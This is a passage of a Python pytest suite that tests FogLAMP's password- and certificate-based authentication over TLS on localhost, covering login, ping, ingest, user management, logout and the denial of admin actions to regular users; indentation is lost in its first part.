assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert not jdoc['admin']
# Delete Certificates and keys created
remove_data_file('custom.key')
remove_data_file('custom.csr')
remove_data_file('custom.cert')
def test_ping_with_allow_ping_true(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert 0 == jdoc['dataRead'], "data NOT seen in ping header"
def test_ingest_with_password_token(self, foglamp_url, wait_time):
add_south_http(foglamp_url, HTTP_SOUTH_SVC_NAME, PASSWORD_TOKEN, wait_time, tls_enabled=True)
generate_json_for_fogbench(ASSET_NAME)
send_data_using_fogbench(wait_time)
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert 10 == jdoc['dataRead'], "data NOT seen in ping header"
def test_ingest_with_certificate_token(self, foglamp_url, wait_time):
add_south_http(foglamp_url, HTTP_SOUTH_SVC_NAME_1, CERT_TOKEN, wait_time, tls_enabled=True)
generate_json_for_fogbench(ASSET_NAME)
send_data_using_fogbench(wait_time)
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert 20 == jdoc['dataRead'], "data NOT seen in ping header"
def test_ping_with_allow_ping_false_with_password_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
_token = jdoc["token"]
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", '/foglamp/category/rest_api', body=json.dumps({"allowPing": "false"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", '/foglamp/logout', headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
assert 403 == r.status
assert "Forbidden" == r.reason
def test_ping_with_allow_ping_false_with_certificate_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
_token = jdoc["token"]
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", '/foglamp/category/rest_api', json.dumps({"allowPing": "false"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", '/foglamp/logout', headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
assert 403 == r.status
assert "Forbidden" == r.reason
@pytest.mark.parametrize(("query", "expected_values"), [
('', {'users': [{'userId': 1, 'roleId': 1, 'userName': 'admin'},
{'userId': 2, 'roleId': 2, 'userName': 'user'}]}),
('?id=2', {'userId': 2, 'roleId': 2, 'userName': 'user'}),
('?username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
('?id=1&username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
])
def test_get_users_with_password_token(self, query, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/user{}".format(query), headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
@pytest.mark.parametrize(("query", "expected_values"), [
('', {'users': [{'userId': 1, 'roleId': 1, 'userName': 'admin'},
{'userId': 2, 'roleId': 2, 'userName': 'user'}]}),
('?id=2', {'userId': 2, 'roleId': 2, 'userName': 'user'}),
('?username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
('?id=1&username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
])
def test_get_users_with_certificate_token(self, query, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/user{}".format(query), headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
def test_get_roles_with_password_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/user/role", headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'roles': [{'description': 'All CRUD privileges', 'id': 1, 'name': 'admin'},
{'description': 'All CRUD operations and self profile management',
'id': 2, 'name': 'user'}]} == jdoc
def test_get_roles_with_certificate_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/user/role", headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'roles': [{'description': 'All CRUD privileges', 'id': 1, 'name': 'admin'},
{'description': 'All CRUD operations and self profile management',
'id': 2, 'name': 'user'}]} == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any1", "password": "User@123"}, {'user': {'userName': 'any1', 'userId': 3, 'roleId': 2},
'message': 'User has been created successfully'}),
({"username": "admin1", "password": "F0gl@mp!", "role_id": 1},
{'user': {'userName': 'admin1', 'userId': 4, 'roleId': 1},
'message': 'User has been created successfully'}),
])
def test_create_user_with_password_token(self, form_data, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/admin/user", body=json.dumps(form_data),
headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any2", "password": "User@123"}, {'user': {'userName': 'any2', 'userId': 5, 'roleId': 2},
'message': 'User has been created successfully'}),
({"username": "admin2", "password": "F0gl@mp!", "role_id": 1},
{'user': {'userName': 'admin2', 'userId': 6, 'roleId': 1},
'message': 'User has been created successfully'}),
])
def test_create_user_with_certificate_token(self, form_data, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/admin/user", body=json.dumps(form_data),
headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any1", "password": "User@123"}, 'Logged in successfully'),
({"username": "admin1", "password": "F0gl@mp!"}, 'Logged in successfully'),
({"username": "any2", "password": "User@123"}, 'Logged in successfully'),
({"username": "admin2", "password": "F0gl@mp!"}, 'Logged in successfully')
])
def test_login_of_newly_created_user(self, form_data, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", body=json.dumps(form_data))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc['message']
def test_update_password_with_password_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", "/foglamp/user/any1/password", body=json.dumps({"current_password": "User@123",
"new_password": "F0gl@mp1"}),
headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'Password has been updated successfully for user id:<3>'} == jdoc
def test_update_password_with_certificate_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", "/foglamp/user/any2/password", body=json.dumps({"current_password": "User@123",
"new_password": "F0gl@mp2"}),
headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'Password has been updated successfully for user id:<5>'} == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any1", "password": "F0gl@mp1"}, 'Logged in successfully'),
({"username": "any2", "password": "F0gl@mp2"}, 'Logged in successfully')
])
def test_login_with_updated_password(self, form_data, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", body=json.dumps(form_data))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc['message']
def test_reset_user_with_password_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", "/foglamp/admin/3/reset", body=json.dumps({"role_id": 1, "password": "F0gl@mp!#1"}),
headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'User with id:<3> has been updated successfully'} == jdoc
def test_reset_user_with_certificate_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", "/foglamp/admin/5/reset", body=json.dumps({"role_id": 1, "password": "F0gl@mp!#2"}),
headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'User with id:<5> has been updated successfully'} == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any1", "password": "F0gl@mp!#1"}, 'Logged in successfully'),
({"username": "any2", "password": "F0gl@mp!#2"}, 'Logged in successfully')
])
def test_login_with_resetted_password(self, form_data, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", body=json.dumps(form_data))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc['message']
def test_delete_user_with_password_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("DELETE", "/foglamp/admin/4/delete", headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': "User has been deleted successfully"} == jdoc
def test_delete_user_with_certificate_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("DELETE", "/foglamp/admin/6/delete", headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': "User has been deleted successfully"} == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "admin1", "password": "F0gl@mp!"}, ""),
({"username": "admin2", "password": "F0gl@mp!"}, "")
])
def test_login_of_deleted_user(self, form_data, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", body=json.dumps(form_data))
r = conn.getresponse()
assert 404 == r.status
assert "User does not exist" == r.reason
def test_logout_all_with_password_token(self):
    """PUT /foglamp/{user_id}/logout invalidates every session of user id 1."""
    connection = http.client.HTTPSConnection("localhost", 1995, context=context)
    connection.request("PUT", '/foglamp/1/logout', headers={"authorization": PASSWORD_TOKEN})
    response = connection.getresponse()
    assert 200 == response.status
    payload = json.loads(response.read().decode())
    assert payload['logout']
def test_verify_logout(self):
    """A token invalidated by logout-all must be rejected with 401."""
    connection = http.client.HTTPSConnection("localhost", 1995, context=context)
    connection.request("GET", '/foglamp/asset', headers={"authorization": PASSWORD_TOKEN})
    response = connection.getresponse()
    assert 401 == response.status
def test_admin_actions_forbidden_for_regular_user_with_pwd_token(self):
    """Test that regular user is not able to perform any actions that only an admin can"""
    # Login with regular user
    connection = http.client.HTTPSConnection("localhost", 1995, context=context)
    connection.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "foglamp"}))
    response = connection.getresponse()
    assert 200 == response.status
    payload = json.loads(response.read().decode())
    assert not payload['admin']
    token = payload["token"]

    def assert_forbidden(method, url, body=None):
        # Every admin-only endpoint must reject the regular user's token.
        connection.request(method, url, body=body, headers={"authorization": token})
        resp = connection.getresponse()
        assert 403 == resp.status
        assert "403: Forbidden" == resp.read().decode()

    # Create User
    assert_forbidden("POST", "/foglamp/admin/user",
                     body=json.dumps({"username": "other", "password": "User@123"}))
    # Reset User
    assert_forbidden("PUT", "/foglamp/admin/2/reset",
                     body=json.dumps({"role_id": 1, "password": "F0gl@p!"}))
    # Delete User
    assert_forbidden("DELETE", "/foglamp/admin/2/delete")
def test_admin_actions_forbidden_for_regular_user_with_cert_token(self):
    """Test that regular user is not able to perform any actions that only an admin can"""
    # Login with regular user
    connection = http.client.HTTPSConnection("localhost", 1995, context=context)
    cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/user.cert')
    with open(cert_file_path, 'r') as cert_file:
        connection.request("POST", "/foglamp/login", body=cert_file)
    response = connection.getresponse()
    assert 200 == response.status
    payload = json.loads(response.read().decode())
    assert not payload['admin']
    token = payload["token"]

    def assert_forbidden(method, url, body=None):
        # Every admin-only endpoint must reject the regular user's token.
        connection.request(method, url, body=body, headers={"authorization": token})
        resp = connection.getresponse()
        assert 403 == resp.status
        assert "403: Forbidden" == resp.read().decode()

    # Create User
    assert_forbidden("POST", "/foglamp/admin/user",
                     body=json.dumps({"username": "other", "password": "User@123"}))
    # Reset User
    assert_forbidden("PUT", "/foglamp/admin/2/reset",
                     body=json.dumps({"role_id": 1, "password": "F0gl@p!"}))
    # Delete User
    assert_forbidden("DELETE", "/foglamp/admin/2/delete")
@pytest.mark.skip(reason="Currently this function is not implemented.")
def test_regular_user_access_to_admin_api_config(self, foglamp_url):
    # Placeholder: coverage for regular-user access to the admin config API,
    # to be filled in once the feature exists.
    pass
class TestAuthPasswordWithTLS:
    """Ordered end-to-end suite for password-based authentication with TLS enabled.

    All requests target https://localhost:1995 using the module-level ssl
    ``context``. NOTE(review): tests are order-dependent — login tests store a
    token in the module-level PASSWORD_TOKEN global, later tests consume it,
    and created users receive sequential ids (3, 4) that the reset/delete
    tests hard-code. Run the class as a whole, in order.
    """

    def test_login_username_regular_user(self, reset_foglamp, change_to_auth_mandatory_password,
                                         generate_password_based_auth_token, enable_tls, wait_time,
                                         foglamp_url):
        # Enable TLS with mandatory password auth, then log in as the built-in
        # non-admin user and cache the session token for subsequent tests.
        auth = 'password'
        enable_tls(foglamp_url, wait_time, auth)
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "foglamp"}))
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert "Logged in successfully" == jdoc['message']
        assert not jdoc['admin']
        global PASSWORD_TOKEN
        PASSWORD_TOKEN = jdoc["token"]

    def test_logout_me(self):
        # PUT /foglamp/logout invalidates only the presented token.
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("PUT", '/foglamp/logout', headers={"authorization": PASSWORD_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert jdoc['logout']

    def test_login_with_invalid_credentials_regular_user(self):
        # Wrong password (case-sensitive) must be rejected.
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "Foglamp"}))
        r = conn.getresponse()
        assert 404 == r.status
        assert "Username or Password do not match" == r.reason

    def test_login_username_admin(self):
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "foglamp"}))
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert "Logged in successfully" == jdoc['message']
        assert "token" in jdoc
        assert jdoc['admin']
        # Replace the regular-user token with the admin one; subsequent
        # admin-only tests (user CRUD) rely on it.
        global PASSWORD_TOKEN
        PASSWORD_TOKEN = jdoc["token"]

    def test_login_with_invalid_credentials_admin(self):
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "FOGLAMP"}))
        r = conn.getresponse()
        assert 404 == r.status
        assert "Username or Password do not match" == r.reason

    def test_login_with_admin_certificate(self):
        # Certificate login must be rejected while the auth method is 'password'.
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
        with open(cert_file_path, 'r') as f:
            conn.request("POST", "/foglamp/login", body=f)
        r = conn.getresponse()
        assert 400 == r.status
        assert "Use a valid username and password to login." == r.reason

    def test_ping_with_allow_ping_true(self):
        # Unauthenticated ping is allowed by default; no data ingested yet.
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("GET", "/foglamp/ping")
        r = conn.getresponse()
        jdoc = json.loads(r.read().decode())
        assert "dataRead" in jdoc
        assert 0 == jdoc['dataRead'], "data NOT seen in ping header"

    def test_ingest(self, foglamp_url, wait_time):
        # Ingest 10 readings via an HTTP-south service; ping should reflect them.
        add_south_http(foglamp_url, HTTP_SOUTH_SVC_NAME, PASSWORD_TOKEN, wait_time, tls_enabled=True)
        generate_json_for_fogbench(ASSET_NAME)
        send_data_using_fogbench(wait_time)
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("GET", "/foglamp/ping")
        r = conn.getresponse()
        jdoc = json.loads(r.read().decode())
        assert "dataRead" in jdoc
        assert 10 == jdoc['dataRead'], "data NOT seen in ping header"

    def test_ping_with_allow_ping_false(self):
        # Turning allowPing off must make the unauthenticated ping return 403.
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "foglamp"}))
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert "Logged in successfully" == jdoc['message']
        _token = jdoc["token"]
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("PUT", '/foglamp/category/rest_api', body=json.dumps({"allowPing": "false"}),
                     headers={"authorization": _token})
        r = conn.getresponse()
        assert 200 == r.status
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("PUT", '/foglamp/logout', headers={"authorization": _token})
        r = conn.getresponse()
        assert 200 == r.status
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("GET", "/foglamp/ping")
        r = conn.getresponse()
        assert 403 == r.status
        assert "Forbidden" == r.reason

    @pytest.mark.parametrize(("query", "expected_values"), [
        ('', {'users': [{'userId': 1, 'roleId': 1, 'userName': 'admin'},
                        {'userId': 2, 'roleId': 2, 'userName': 'user'}]}),
        ('?id=2', {'userId': 2, 'roleId': 2, 'userName': 'user'}),
        ('?username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
        ('?id=1&username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
    ])
    def test_get_users(self, query, expected_values):
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("GET", "/foglamp/user{}".format(query), headers={"authorization": PASSWORD_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert expected_values == jdoc

    def test_get_roles(self):
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("GET", "/foglamp/user/role", headers={"authorization": PASSWORD_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert {'roles': [{'description': 'All CRUD privileges', 'id': 1, 'name': 'admin'},
                          {'description': 'All CRUD operations and self profile management',
                           'id': 2, 'name': 'user'}]} == jdoc

    @pytest.mark.parametrize(("form_data", "expected_values"), [
        ({"username": "any1", "password": "User@123"}, {'user': {'userName': 'any1', 'userId': 3, 'roleId': 2},
                                                       'message': 'User has been created successfully'}),
        ({"username": "admin1", "password": "F0gl@mp!", "role_id": 1},
         {'user': {'userName': 'admin1', 'userId': 4, 'roleId': 1},
          'message': 'User has been created successfully'}),
    ])
    def test_create_user(self, form_data, expected_values):
        # New users get sequential ids (3, 4) consumed by reset/delete tests below.
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("POST", "/foglamp/admin/user", body=json.dumps(form_data),
                     headers={"authorization": PASSWORD_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert expected_values == jdoc

    @pytest.mark.parametrize(("form_data", "expected_values"), [
        ({"username": "any1", "password": "User@123"}, 'Logged in successfully'),
        ({"username": "admin1", "password": "F0gl@mp!"}, 'Logged in successfully')
    ])
    def test_login_of_newly_created_user(self, form_data, expected_values):
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("POST", "/foglamp/login", body=json.dumps(form_data))
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert expected_values == jdoc['message']

    def test_update_password(self):
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("PUT", "/foglamp/user/any1/password", body=json.dumps({"current_password": "User@123",
                                                                            "new_password": "F0gl@mp1"}),
                     headers={"authorization": PASSWORD_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert {'message': 'Password has been updated successfully for user id:<3>'} == jdoc

    def test_login_with_updated_password(self):
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("POST", "/foglamp/login", body=json.dumps({"username": "any1", "password": "F0gl@mp1"}))
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert 'Logged in successfully' == jdoc['message']

    def test_reset_user(self):
        # Admin resets user 3's role and password.
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("PUT", "/foglamp/admin/3/reset", body=json.dumps({"role_id": 1, "password": "F0gl@mp!"}),
                     headers={"authorization": PASSWORD_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert {'message': 'User with id:<3> has been updated successfully'} == jdoc

    def test_login_with_resetted_password(self):
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("POST", "/foglamp/login", body=json.dumps({"username": "any1", "password": "F0gl@mp!"}))
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert 'Logged in successfully' == jdoc['message']

    def test_delete_user(self):
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("DELETE", "/foglamp/admin/4/delete", headers={"authorization": PASSWORD_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert {'message': "User has been deleted successfully"} == jdoc

    def test_login_of_deleted_user(self):
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("POST", "/foglamp/login", body=json.dumps({"username": "admin1", "password": "F0gl@mp!"}))
        r = conn.getresponse()
        assert 404 == r.status
        assert "User does not exist" == r.reason

    def test_logout_all(self):
        # Invalidate every session of user id 1.
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("PUT", '/foglamp/1/logout', headers={"authorization": PASSWORD_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert jdoc['logout']

    def test_verify_logout(self):
        # The invalidated token must now be rejected.
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("GET", '/foglamp/asset', headers={"authorization": PASSWORD_TOKEN})
        r = conn.getresponse()
        assert 401 == r.status

    def test_admin_actions_forbidden_for_regular_user(self):
        """Test that regular user is not able to perform any actions that only an admin can"""
        # Login with regular user
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "foglamp"}))
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert not jdoc['admin']
        _token = jdoc["token"]
        # Create User
        conn.request("POST", "/foglamp/admin/user", body=json.dumps({"username": "other",
                                                                     "password": "User@123"}),
                     headers={"authorization": _token})
        r = conn.getresponse()
        assert 403 == r.status
        r = r.read().decode()
        assert "403: Forbidden" == r
        # Reset User
        conn.request("PUT", "/foglamp/admin/2/reset", body=json.dumps({"role_id": 1, "password": "F0gl@p!"}),
                     headers={"authorization": _token})
        r = conn.getresponse()
        assert 403 == r.status
        r = r.read().decode()
        assert "403: Forbidden" == r
        # Delete User
        conn.request("DELETE", "/foglamp/admin/2/delete", headers={"authorization": _token})
        r = conn.getresponse()
        assert 403 == r.status
        r = r.read().decode()
        assert "403: Forbidden" == r

    @pytest.mark.skip(reason="Currently this feature is not implemented.")
    def test_regular_user_access_to_admin_api_config(self, foglamp_url):
        # Placeholder until the admin config API access restriction exists.
        pass
class TestAuthCertificateWithTLS:
    """Ordered end-to-end suite for certificate-based authentication with TLS.

    NOTE(review): order-dependent like the password suite — the admin
    certificate login stores its token in the module-level CERT_TOKEN global,
    later tests consume it, and created users get hard-coded sequential ids.
    """

    def test_login_with_user_certificate(self, foglamp_url, reset_foglamp, change_to_auth_mandatory_certificate,
                                         generate_certificate_based_auth_token, enable_tls, wait_time):
        # Enable TLS with mandatory certificate auth, then log in with the
        # regular user's certificate.
        auth = 'certificate'
        enable_tls(foglamp_url, wait_time, auth)
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/user.cert')
        with open(cert_file_path, 'r') as f:
            conn.request("POST", "/foglamp/login", body=f)
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert "Logged in successfully" == jdoc['message']
        assert "token" in jdoc
        assert not jdoc['admin']

    def test_login_with_admin_certificate(self):
        # Admin certificate login; cache the token for the admin-only tests.
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
        with open(cert_file_path, 'r') as f:
            conn.request("POST", "/foglamp/login", body=f)
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert "Logged in successfully" == jdoc['message']
        assert "token" in jdoc
        assert jdoc['admin']
        global CERT_TOKEN
        CERT_TOKEN = jdoc["token"]

    def test_login_with_custom_certificate(self, remove_data_file):
        # Create a custom certificate and sign
        # NOTE(review): subprocess.run is called without check=True, so a
        # non-zero openssl exit status does NOT raise CalledProcessError and
        # the except branch below is effectively dead — confirm and consider
        # adding check=True.
        try:
            subprocess.run(["openssl genrsa -out custom.key 1024 2> /dev/null"], shell=True)
            subprocess.run(["openssl req -new -key custom.key -out custom.csr -subj '/C=IN/CN=user' 2> /dev/null"],
                           shell=True)
            subprocess.run(["openssl x509 -req -days 1 -in custom.csr "
                            "-CA $FOGLAMP_ROOT/data/etc/certs/ca.cert -CAkey $FOGLAMP_ROOT/data/etc/certs/ca.key "
                            "-set_serial 01 -out custom.cert 2> /dev/null"], shell=True)
        except subprocess.CalledProcessError:
            assert False, " Certificate creation failed!"
        # Login with custom certificate
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        cert_file_path = 'custom.cert'
        with open(cert_file_path, 'r') as f:
            conn.request("POST", "/foglamp/login", body=f)
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert "Logged in successfully" == jdoc['message']
        assert "token" in jdoc
        assert not jdoc['admin']
        # Delete Certificates and keys created
        remove_data_file('custom.key')
        remove_data_file('custom.csr')
        remove_data_file('custom.cert')

    def test_login_with_invalid_credentials(self, remove_data_file):
        # A file that is not a real certificate must be rejected.
        try:
            subprocess.run(["echo 'Foglamp certificate' > template.cert"], shell=True)
        except subprocess.CalledProcessError:
            assert False, " Certificate creation failed!"
        # Login with custom certificate
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        cert_file_path = 'template.cert'
        with open(cert_file_path, 'r') as f:
            conn.request("POST", "/foglamp/login", body=f)
        r = conn.getresponse()
        assert 400 == r.status
        assert 'Use a valid certificate to login.' == r.reason
        # Delete Certificates and keys created
        remove_data_file('template.cert')

    def test_login_username_admin(self):
        # Password login must be rejected while the auth method is 'certificate'.
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "foglamp"}))
        r = conn.getresponse()
        assert 400 == r.status
        assert "Use a valid certificate to login." == r.reason

    def test_ping_with_allow_ping_true(self):
        # Unauthenticated ping is allowed by default; no data ingested yet.
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("GET", "/foglamp/ping")
        r = conn.getresponse()
        jdoc = json.loads(r.read().decode())
        assert "dataRead" in jdoc
        assert 0 == jdoc['dataRead'], "data NOT seen in ping header"

    def test_ingest(self, foglamp_url, wait_time):
        # Ingest 10 readings via an HTTP-south service; ping should reflect them.
        add_south_http(foglamp_url, HTTP_SOUTH_SVC_NAME, CERT_TOKEN, wait_time, tls_enabled=True)
        generate_json_for_fogbench(ASSET_NAME)
        send_data_using_fogbench(wait_time)
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("GET", "/foglamp/ping")
        r = conn.getresponse()
        jdoc = json.loads(r.read().decode())
        assert "dataRead" in jdoc
